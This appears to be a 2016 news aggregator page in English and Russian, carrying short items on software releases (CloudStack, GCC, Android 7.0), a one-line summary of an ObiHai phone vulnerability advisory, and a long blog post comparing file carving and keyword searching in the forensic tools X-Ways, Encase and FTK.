    ObiHai ObiPhone 1032/1062 with firmware less than 5-0-0-3497 suffers from buffer overflow, cross site scripting, cross site request forgery, command injection, denial of service, and various other vulnerabilities.

    orig: 2016-08-22 18:13:38 / https://packetstormsecurity.com/files/138462/obihai-xssxsrfdos.txt (click post title)



    Доступна облачная платформа Apache CloudStack 4.9

    Представлен релиз облачной платформы Apache CloudStack 4.9, которая позволяет автоматизировать развертывание, настройку и поддержание приватной, гибридной или публичной cloud-инфраструктуры (IaaS, инфраструктура как сервис). Платформа CloudStack передана Фонду Apache компанией Citrix, которая получила проект после поглощения компании Cloud.com. Установочные пакеты подготовлены для RHEL/CentOS и Ubuntu.

    orig: 2016-08-22 17:43:38 / http://www.opennet.ru/opennews/art.shtml?num=45014 (click post title)



    Выпуск набора компиляторов GCC 6.2

    Доступен корректирующий релиз набора компиляторов GCC 6.2, в котором проведена работа по исправлению ошибок, регрессивных изменений и проблем с совместимостью. По сравнению с версией GCC 6.1 в GCC 6.2 отмечено более 110 исправлений. Напомним, что начиная с ветки GCC 5.x в проекте внедрена новая схема нумерации выпусков: версия x.0 используется в процессе разработки, корректирующие выпуски формируются с номерами x.2.0, x.3.0 и т.д. Новые возможности развиваются в экспериментальной ветке GCC 7.0, на базе которой будет сформирован следующий значительный релиз GCC 7.1.

    orig: 2016-08-22 17:02:46 / http://www.opennet.ru/opennews/art.shtml?num=45016 (click post title)



    Workflow overview

    (This post is part of a larger post which can be found here (this will link to main post once its out). It has been separated out to keep the main post from getting too long.)

    Workflow overviewThere are two main sections, carving and searching, below. Each contains an overview of how each of those main operations is performed in Encase, FTK and X-Ways.CarvingX-WaysLike everything that affects the volume snapshot, the File header signature search is found under the Refine Volume Snapshot option.










    Here the File header signature search option is checked.












































    After clicking OK, groups of file signatures (or types within them) are selected. Additional options to categorize or place carved files with their "parent" files are also available. X-Ways displays the most commonly used groups of things first and inside each group, the most common types are at the top. You can also type an extension to quickly jump to the first match.
































    After clicking OK in the File header search options, X-Ways starts carving and provides feedback on how many fiiles its recovered so far (+11 files) and the throughput. When carving is finished, X-Ways tells you how many files have been added to the volume snapshot as a result of last operation.




















    X-Ways places all of the carved files under a virtual folder named "Path unknown\Carved files." Clicking on this directory displays all of the carved items.












    When X-Ways refines the volume snapshot, it keeps track of  how many new items have been added to the snapshot. To quickly see only the files that were added as a result of the last refinement, the Int. ID (internal ID) filter can be used. Notice that it defaults to the same number as we saw above and the highest option is selected. This means the newest 408 items will be shown as a result of the filter.















    After filtering, the results look like this:





    While this kind of filtering is not necessary, it is often very helpful to filter out everything but carved items for review.
    Encase 8From the Evidence tab, select Process evidence | Process:













    Under the Modules section is the File Carver option. Double clicking on this brings up a list of categories and file types.


    After selecting signatures and clicking OK, the job is queued. To review carved files, use View | Artifacts 



























    From there, look at the File Carver - Entries section






























    From here, review the carved files as needed.













    The progress of each job can be seen under View | Processor Manager as well as the lower right corner (job name only). A progress percentage is shown under the Status column. When processing a case, it often went to 100%, then jumped back to a lower percentage, then rose again.



















    FTKSelect Evidence | Additional Analysis













    Click the Miscellaneous tab, check Data carve, and review Carving options















    The job is queued. When finished, the results can be seen on the Overview under File Status | Data carved files.


















    SearchingX-Ways Simultaneous searchSearching starts via an icon on the main interface or via the Search menu.













    From here, keywords are entered one on a line. Options to the left allow for grep searches or even 'normal' and grep searches at the same time.
    Code pages are also selected here as well as the type of search to do (Logical or index based) and the number of threads to use (from 1 per core to a max of 6).


































    After clicking OK, X-Ways shows files being processed, time remaining, and the number of hits so far. When finished, a summary is displayed.























    The search results are then displayed and can be sorted or filtered in a variety of ways, including context around the search hit (i.e. does 'hardware' appear within 20 bytes of the search hit, etc). These results, along with context and highlighting, can be exported as needed.








    X-Ways also allows for only looking at one or more search hits using boolean logic, 'near' searches (i.e. show only files where stefan is within 100 bytes of winhex), showing files with a certain number of terms in it (min 1, all 3, etc), and so on.



















    X-Ways will only show you the hits in files that are listed in the directory browser (as opposed to all hits everywhere). This is handy because if you want to only see hits for a given user's profile for example, you can recursively list only that user's home directory. Once this is done, the search hit numbers will be updated to reflect what is available in the user's folders.
    Here only the 'Rotunda' hits are selected


















    and the resulting hits are then displayed.











    Selecting a search hit shows the hit in file file with highlighting




















    Clicking on the Preview tab would show the file, if applicable, in its decoded state with the first instance of the search term highlighted. 
    X-Ways Index searchTo create the index, use the Refine Volume Snapshot option










    Then select Indexing










































    Set preferences (the defaults are almost always right, but things like character substitution are very nice for foreign language related cases)























    The index is then built and can be canceled at any time. When canceled, the index is completed up to the point where it was canceled as opposed to dropped entirely.










    Searching against the index is done via the same interface as a Simultaneous search, but the dropdown at the bottom is changed from Logical to Index. Grep is still an option when using index search as well.





















    Reviewing the results is exactly the same as with the Simultaneous search

    Encase Keyword searchingSelect Evidence | Process Evidence | Process





    Check the 'Search for keywords' module, then double click 'Search for keywords' title for options.

    Click Add keyword list, enter one keyword on a line, and check the encoding options.















    Select View | Search, then click the Keywords tab. From there clicking on a keyword shows the files with hits to the right. To see the hit in context, right click in the hex view and choose the appropriate option.













    When switching to different files, Encase kept the same offset it previously had vs. selecting the first hit in the newly selected file. Compressed view helps alleviate this, but it still made review difficult.


    Encase Index searchingBring up the Process option as before










    Check the Index text and metadata option, then double click it for options.





































    Once the job is finished, use View | Search | Index to interact with the index. As words are entered, matching strings from the index are listed. Clicking one of these words allows files with said word in it to be reviewed.


































    Index hits did not seem to allow showing the context of the hit like a keyword search did.



    FTK Live searchSelect the Live search tab, then check the encodings to use. You MUST check these before adding keywords as you cannot change them after they have been added. Click Search when done entering terms to queue the job













    The job is queued. When it is finished, results will be shown to the right of the main FTK interface
















    Expanding the keyword search job allows for reviewing hits. Selecting a hit will show it in the File Content section. 






















    Unless there is a different interface to review hits, it seemed necessary to check in as many places as there were selected code pages. Unless there is a better way to review hits, it was difficult to review several hits at once.















    FTK Index searchSelect Evidence | Additional processing



















    Select the Indexing tab and check the appropriate boxes. I did not see options to adjust indexing parameters in the GUI.
































    The indexing job is queued.
















    Canceling an indexing job results in NO index being created at all.

    To use the index, select the Index search tab, then enter terms to search for. To review search hits, double click an added term and the results are shown to the right.
    As with live search, reviewing things was difficult due to the grouping.
    Additionally, could not get FTK to show the hit in hex view by simply clicking on the hex tab. Had to search for it in the hex view after switching to that tab. Cannot lock view on hex tab either, so seeing native hits requires several additional steps.







    orig: 2016-08-22 16:45:21 / http://binaryforay.blogspot.com/2016/08/workflow-overview.html (click post title)



    Webinar: BlackLight 2016 R2 - New Features

    Monday, August 22, 2016 (14:48:28)

    Webinar: BlackLight 2016 R2 - New Features

    A recording of the webinar "BlackLight 2016 R2 - New Features" is now online and available to view here.

    Join the forum discussion here.
    View the webinar on YouTube here.
    Read a full transcript of the webinar here.

    orig: 2016-08-22 14:48:28 / http://www.forensicfocus.com/News/article/sid=2716/ (click post title)



    Релиз мобильной платформы Android 7.0

    Компания Google объявила о начале распространения выпуска платформы Android 7.0 "Nougat" для устройств Nexus. Начиная с сегодняшнего дня в течение нескольких недель обновление будет предложено пользователям устройств Nexus 6, Nexus 5X, Nexus 6P, Nexus Player, Nexus 9, Pixel C и General Mobile 4G (Android One). Связанные с новым выпуском исходные тексты в скором времени будут размещены в Git-репозиторий проекта (ветка android-7.0.0_r1). Из ключевых новшеств можно отметить многооконный режим, графический API Vulkan, использование OpenJDK, поддержка прямой отправки ответов из уведомлений, режим Direct Boot, API для доступа к директориям на внешних носителях, новый API MediaBrowser.

    orig: 2016-08-22 14:42:22 / http://www.opennet.ru/opennews/art.shtml?num=45015 (click post title)



    Далее...